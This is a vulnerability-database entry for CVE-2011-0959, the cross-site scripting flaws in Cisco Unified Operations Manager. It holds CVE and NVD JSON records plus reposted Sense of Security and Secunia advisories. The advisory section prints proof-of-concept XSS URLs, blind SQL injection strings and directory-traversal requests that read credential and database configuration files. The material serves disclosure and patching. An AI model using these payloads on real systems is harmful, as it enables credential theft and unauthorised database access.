cvelistv5 - CVE-2011-0959

CVE-2011-0959 (GCVE-0-2011-0959)

Vulnerability from cvelistv5 – Published: 2011-05-20 22:00 – Updated: 2024-08-06 22:14

Summary

Severity ?

No CVSS data available.

CWE

Assigner

cisco

References

URL

Tags

	http://tools.cisco.com/security/center/viewAlert.…	x_refsource_CONFIRM
	http://www.senseofsecurity.com.au/advisories/SOS-…	x_refsource_MISC
	http://archives.neohapsis.com/archives/fulldisclo…	mailing-listx_refsource_FULLDISC
	http://www.exploit-db.com/exploits/17304	exploitx_refsource_EXPLOIT-DB
	https://exchange.xforce.ibmcloud.com/vulnerabilit…	vdb-entryx_refsource_XF

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T22:14:26.542Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23085"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf"
          },
          {
            "name": "20110518 Cisco Unified Operations Manager Multiple Vulnerabilities - SOS-11-006",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0371.html"
          },
          {
            "name": "17304",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "http://www.exploit-db.com/exploits/17304"
          },
          {
            "name": "cisco-uom-multiple-xss(67521)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/67521"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-05-18T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Operations Manager (CUOM) before 8.6 allow remote attackers to inject arbitrary web script or HTML via (1) the extn parameter to iptm/advancedfind.do, (2) the deviceInstanceName parameter to iptm/ddv.do, the (3) cmd or (4) group parameter to iptm/eventmon, the (5) clusterName or (6) deviceName parameter to iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, or the (7) ccmName or (8) clusterName parameter to iptm/logicalTopo.do, aka Bug ID CSCtn61716."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-16T14:57:01",
        "orgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
        "shortName": "cisco"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23085"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf"
        },
        {
          "name": "20110518 Cisco Unified Operations Manager Multiple Vulnerabilities - SOS-11-006",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0371.html"
        },
        {
          "name": "17304",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "http://www.exploit-db.com/exploits/17304"
        },
        {
          "name": "cisco-uom-multiple-xss(67521)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/67521"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@cisco.com",
          "ID": "CVE-2011-0959",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Operations Manager (CUOM) before 8.6 allow remote attackers to inject arbitrary web script or HTML via (1) the extn parameter to iptm/advancedfind.do, (2) the deviceInstanceName parameter to iptm/ddv.do, the (3) cmd or (4) group parameter to iptm/eventmon, the (5) clusterName or (6) deviceName parameter to iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, or the (7) ccmName or (8) clusterName parameter to iptm/logicalTopo.do, aka Bug ID CSCtn61716."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23085",
              "refsource": "CONFIRM",
              "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=23085"
            },
            {
              "name": "http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf",
              "refsource": "MISC",
              "url": "http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf"
            },
            {
              "name": "20110518 Cisco Unified Operations Manager Multiple Vulnerabilities - SOS-11-006",
              "refsource": "FULLDISC",
              "url": "http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0371.html"
            },
            {
              "name": "17304",
              "refsource": "EXPLOIT-DB",
              "url": "http://www.exploit-db.com/exploits/17304"
            },
            {
              "name": "cisco-uom-multiple-xss(67521)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/67521"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
    "assignerShortName": "cisco",
    "cveId": "CVE-2011-0959",
    "datePublished": "2011-05-20T22:00:00",
    "dateReserved": "2011-02-10T00:00:00",
    "dateUpdated": "2024-08-06T22:14:26.542Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:cisco:unified_operations_manager:*:*:*:*:*:*:*:*\", \"versionEndIncluding\": \"8.5\", \"matchCriteriaId\": \"690FA80D-A157-4D4E-980D-C9AA0009D853\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:cisco:unified_operations_manager:1.1:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"C5510F4F-93C9-4722-97F5-37A05B48C23D\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:cisco:unified_operations_manager:2.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"C73FD728-7A22-4248-B4DA-62AB2704A411\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:cisco:unified_operations_manager:2.0.1:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"DD2DF29A-4E30-442C-BB14-F22D955B112A\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:cisco:unified_operations_manager:2.0.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"4CA03A21-13EF-476E-892B-D0A494779594\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:cisco:unified_operations_manager:2.0.3:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"107A78CC-8943-4D33-BE60-CBFC72FE405D\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:cisco:unified_operations_manager:2.1:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"930EA844-7016-4EC3-833D-70D1B1DE6DA0\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:cisco:unified_operations_manager:2.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"5CA3DB6A-A1D4-4CB4-A62D-3269E27094D9\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:cisco:unified_operations_manager:2.3:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"D63D2042-C271-4671-9858-2DE4709BAD19\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:cisco:unified_operations_manager:8.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"3BF00348-D8E9-4FC0-A6EA-7B16707441A3\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Operations Manager (CUOM) before 8.6 allow remote attackers to inject arbitrary web script or HTML via (1) the extn parameter to iptm/advancedfind.do, (2) the deviceInstanceName parameter to iptm/ddv.do, the (3) cmd or (4) group parameter to iptm/eventmon, the (5) clusterName or (6) deviceName parameter to iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, or the (7) ccmName or (8) clusterName parameter to iptm/logicalTopo.do, aka Bug ID CSCtn61716.\"}, {\"lang\": \"es\", \"value\": \"M\\u00faltiples vulnerabilidades de ejecuci\\u00f3n de secuencias de comandos en sitios cruzados (XSS) en Cisco Unified Operations Manager (CUOM) antes de v8.6, permite a atacantes remotos inyectar secuencias de comandos web o HTML a trav\\u00e9s de (1) el par\\u00e1metro extn de iptm/advancedfind.do, (2) el par\\u00e1metro deviceInstanceName de iptm/ddv.do, el (3) cmd o (4) el par\\u00e1metro group de iptm/eventmon, el par\\u00e1metro (5) clusterName o (6) deviceName de iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, o el par\\u00e1metro (7) ccmName o (8) clusterName de iptm/logicalTopo.do, tambi\\u00e9n conocido como Bug ID CSCtn61716.\"}]",
      "id": "CVE-2011-0959",
      "lastModified": "2024-11-21T01:25:12.347",
      "metrics": "{\"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:M/Au:N/C:N/I:P/A:N\", \"baseScore\": 4.3, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"MEDIUM\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"PARTIAL\", \"availabilityImpact\": \"NONE\"}, \"baseSeverity\": \"MEDIUM\", \"exploitabilityScore\": 8.6, \"impactScore\": 2.9, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": true}]}",
      "published": "2011-05-20T22:55:02.907",
      "references": "[{\"url\": \"http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0371.html\", \"source\": \"ykramarz@cisco.com\", \"tags\": [\"Exploit\"]}, {\"url\": \"http://tools.cisco.com/security/center/viewAlert.x?alertId=23085\", \"source\": \"ykramarz@cisco.com\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://www.exploit-db.com/exploits/17304\", \"source\": \"ykramarz@cisco.com\", \"tags\": [\"Exploit\"]}, {\"url\": \"http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf\", \"source\": \"ykramarz@cisco.com\", \"tags\": [\"Exploit\", \"URL Repurposed\"]}, {\"url\": \"https://exchange.xforce.ibmcloud.com/vulnerabilities/67521\", \"source\": \"ykramarz@cisco.com\"}, {\"url\": \"http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0371.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\"]}, {\"url\": \"http://tools.cisco.com/security/center/viewAlert.x?alertId=23085\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://www.exploit-db.com/exploits/17304\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\"]}, {\"url\": \"http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"URL Repurposed\"]}, {\"url\": \"https://exchange.xforce.ibmcloud.com/vulnerabilities/67521\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}]",
      "sourceIdentifier": "ykramarz@cisco.com",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-79\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2011-0959\",\"sourceIdentifier\":\"psirt@cisco.com\",\"published\":\"2011-05-20T22:55:02.907\",\"lastModified\":\"2025-04-11T00:51:21.963\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Operations Manager (CUOM) before 8.6 allow remote attackers to inject arbitrary web script or HTML via (1) the extn parameter to iptm/advancedfind.do, (2) the deviceInstanceName parameter to iptm/ddv.do, the (3) cmd or (4) group parameter to iptm/eventmon, the (5) clusterName or (6) deviceName parameter to iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, or the (7) ccmName or (8) clusterName parameter to iptm/logicalTopo.do, aka Bug ID CSCtn61716.\"},{\"lang\":\"es\",\"value\":\"M\u00faltiples vulnerabilidades de ejecuci\u00f3n de secuencias de comandos en sitios cruzados (XSS) en Cisco Unified Operations Manager (CUOM) antes de v8.6, permite a atacantes remotos inyectar secuencias de comandos web o HTML a trav\u00e9s de (1) el par\u00e1metro extn de iptm/advancedfind.do, (2) el par\u00e1metro deviceInstanceName de iptm/ddv.do, el (3) cmd o (4) el par\u00e1metro group de iptm/eventmon, el par\u00e1metro (5) clusterName o (6) deviceName de iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, o el par\u00e1metro (7) ccmName o (8) clusterName de iptm/logicalTopo.do, tambi\u00e9n conocido como Bug ID CSCtn61716.\"}],\"metrics\":{\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:N/C:N/I:P/A:N\",\"baseScore\":4.3,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.6,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":true}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_operations_manager:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"8.5\",\"matchCriteriaId\":\"690FA80D-A157-4D4E-980D-C9AA0009D853\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_operations_manager:1.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C5510F4F-93C9-4722-97F5-37A05B48C23D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_operations_manager:2.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C73FD728-7A22-4248-B4DA-62AB2704A411\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_operations_manager:2.0.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DD2DF29A-4E30-442C-BB14-F22D955B112A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_operations_manager:2.0.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4CA03A21-13EF-476E-892B-D0A494779594\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_operations_manager:2.0.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"107A78CC-8943-4D33-BE60-CBFC72FE405D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_operations_manager:2.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"930EA844-7016-4EC3-833D-70D1B1DE6DA0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_operations_manager:2.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5CA3DB6A-A1D4-4CB4-A62D-3269E27094D9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_operations_manager:2.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D63D2042-C271-4671-9858-2DE4709BAD19\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_operations_manager:8.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3BF00348-D8E9-4FC0-A6EA-7B16707441A3\"}]}]}],\"references\":[{\"url\":\"http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0371.html\",\"source\":\"psirt@cisco.com\",\"tags\":[\"Exploit\"]},{\"url\":\"http://tools.cisco.com/security/center/viewAlert.x?alertId=23085\",\"source\":\"psirt@cisco.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://www.exploit-db.com/exploits/17304\",\"source\":\"psirt@cisco.com\",\"tags\":[\"Exploit\"]},{\"url\":\"http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf\",\"source\":\"psirt@cisco.com\",\"tags\":[\"Exploit\",\"URL Repurposed\"]},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/67521\",\"source\":\"psirt@cisco.com\"},{\"url\":\"http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0371.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\"]},{\"url\":\"http://tools.cisco.com/security/center/viewAlert.x?alertId=23085\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://www.exploit-db.com/exploits/17304\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\"]},{\"url\":\"http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"URL Repurposed\"]},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/67521\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
  }
}

VAR-201105-0046

Vulnerability from variot - Updated: 2024-02-14 22:47

Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Operations Manager (CUOM) before 8.6 allow remote attackers to inject arbitrary web script or HTML via (1) the extn parameter to iptm/advancedfind.do, (2) the deviceInstanceName parameter to iptm/ddv.do, the (3) cmd or (4) group parameter to iptm/eventmon, the (5) clusterName or (6) deviceName parameter to iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, or the (7) ccmName or (8) clusterName parameter to iptm/logicalTopo.do, aka Bug ID CSCtn61716. Cisco Unified Operations Manager (CUOM) Contains a cross-site scripting vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible. This issue is being tracked by Cisco Bug ID CSCtn61716. Sense of Security - Security Advisory - SOS-11-006

Release Date. 18-May-2011 Last Update. - Vendor Notification Date. 28-Feb-2011 Product. Cisco Unified Operations Manager Common Services Framework Help Servlet Common Services Device Center CiscoWorks Homepage Note: All of the above products are included by default in CuOM. Platform. Microsoft Windows Affected versions. CuOM 8.0 and 8.5 (verified), possibly others. Severity Rating. Medium - Low Impact. Database access, cookie and credential theft, impersonation, loss of confidentiality, local file disclosure, information disclosure. Attack Vector. Remote with authentication Solution Status. Vendor patch (upgrade to CuOM 8.6 as advised by Cisco) CVE reference. CVE-2011-0959 (CSCtn61716) CVE-2011-0960 (CSCtn61716) CVE-2011-0961 (CSCto12704) CVE-2011-0962 (CSCto12712) CVE-2011-0966 (CSCto35577)

Details. Operations Manager monitors and evaluates the current status of both the IP communications infrastructure and the underlying transport infrastructure in your network. These vulnerabilities include multiple blind SQL injections, multiple XSS. and a directory traversal vulnerability.

Blind SQL injection vulnerabilities that affect CuOM CVE-2011-0960 (CSCtn61716): The Variable CCMs of PRTestCreation can trigger a blind SQL injection vulnerability by supplying a single quote, followed by a time delay call: /iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs='waitfor%20 delay'0:0:20'--&Extns=&IPs=

Additionally, variable ccm of TelePresenceReportAction can trigger a blind SQL injection vulnerability by supplying a single quote: /iptm/TelePresenceReportAction.do?ccm='waitfor%20delay'0:0:20'--

Reflected XSS vulnerabilities that affect CuOM CVE-2011-0959 (CSCtn61716): /iptm/advancedfind.do?extn=73fcbalert(1)23fb e43447 /iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceC apability=deviceCap /iptm/ddv.do?deviceInstanceName=25099alert(1)f813ea8c 06d&deviceCapability=deviceCap /iptm/eventmon?cmd=filterHelperca99balert(1)542256870 d5&viewname=device.filter&operation=getFilter&dojo.preventCache=129851 8961028 /iptm/eventmon?cmd=getDeviceData&group=/3309dalert(1) 09520eb762c&dojo.preventCache=1298518963370 /iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84"%3b alert(1)//608ddbf972 /iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8"%3ba lert(1)//79877affe89 /iptm/logicalTopo.do?clusterName=&ccmName=ed1b1"%3balert(1)//cda6137ae 4c /iptm/logicalTopo.do?clusterName=db4c1"%3balert(1)//4031caf63d7

Reflected XSS vulnerability that affect Common Services Device Center CVE-2011-0962 (CSCto12712): /CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introduc tionhomepage61a8b"%3balert(1)//4e9adfb2987

Reflected XSS vulnerability that affects Common Services Framework Help Servlet CVE-2011-0961 (CSCto12704): /cwhp/device.center.do?device=&72a9f">alert(1)5f5251a aad=1

Directory traversal vulnerability that affects CiscoWorks Homepage CVE-2011-0966 (CSCto35577): http://target:1741/cwhp/auditLog.do?file=..............\boot.ini cmfDBA user database info: http://target:1741/cwhp/auditLog.do?file=..............\Program Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.prope rties DB connection info for all databases: http://target:1741/cwhp/auditLog.do?file=..............\Program Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.proper ties Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example. DB password change log: http://target:1741/cwhp/auditLog.do?file=..............\Program Files\CSCOpx\log\dbpwdChange.log Solution. Upgrade to CuOM 8.6. Refer to Cisco Bug IDs: CSCtn61716, CSCto12704, CSCto12712 and CSCto35577 for information on patches and availability of fixes.

Discovered by. Sense of Security Labs.

About us. Sense of Security is a leading provider of information security and risk management solutions. Our team has expert skills in assessment and assurance, strategy and architecture, and deployment through to ongoing management. We are Australia's premier application penetration testing firm and trusted IT security advisor to many of the countries largest organisations.

Sense of Security Pty Ltd Level 8, 66 King St Sydney NSW 2000 AUSTRALIA

T: +61 (0)2 9290 4444 F: +61 (0)2 9290 4455 W: http://www.senseofsecurity.com.au E: info@senseofsecurity.com.au Twitter: @ITsecurityAU

The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf

Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php . ----------------------------------------------------------------------

http://twitter.com/secunia

http://www.facebook.com/Secunia

TITLE: Cisco Unified Operations Manager Cross-Site Scripting and SQL Injection Vulnerabilities

SECUNIA ADVISORY ID: SA44597

VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44597/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44597

RELEASE DATE: 2011-05-20

DISCUSS ADVISORY: http://secunia.com/advisories/44597/#comments

AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)

http://secunia.com/advisories/44597/

ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS

https://ca.secunia.com/?page=viewadvisory&vuln_id=44597

ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING

http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

DESCRIPTION: Some vulnerabilities have been reported in Cisco Unified Operations Manager, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.

1) Input passed via the "CCMs" parameter to iptm/PRTestCreation.do and the "ccm" parameter to iptm/TelePresenceReportAction.do is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2) Input passed via various parameters to multiple scripts is not properly sanitised before being returned to the user.

Examples: http://[host]/iptm/advancedfind.do?extn=[code] http://[host]/iptm/ddv.do?deviceCapability=deviceCap&deviceInstanceName=[code] http://[host]/iptm/eventmon?viewname=device.filter&operation=getFilter&cmd=[code] http://[host]/iptm/eventmon?cmd=getDeviceData&group=[code] http://[host]/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=[code] http://[host]/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=[code] http://[host]/iptm/logicalTopo.do?ccmName=[code] http://[host]/iptm/logicalTopo.do?clusterName=[code]

3) Input passed via the "tag" parameter to CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine in Common Services Device Center is not properly sanitised before being returned to the user.

The vulnerabilities are reported in versions 8.0 and 8.5.

SOLUTION: Updated to version 8.6.

PROVIDED AND/OR DISCOVERED BY: Sense of Security Labs

ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=23085 http://tools.cisco.com/security/center/viewAlert.x?alertId=23086 http://tools.cisco.com/security/center/viewAlert.x?alertId=23087

Sense of Security Labs: http://www.senseofsecurity.com.au/advisories/SOS-11-006

OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201105-0046",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "unified operations manager",
        "scope": "eq",
        "trust": 2.5,
        "vendor": "cisco",
        "version": "2.1"
      },
      {
        "model": "unified operations manager",
        "scope": "eq",
        "trust": 2.5,
        "vendor": "cisco",
        "version": "2.2"
      },
      {
        "model": "unified operations manager",
        "scope": "eq",
        "trust": 2.5,
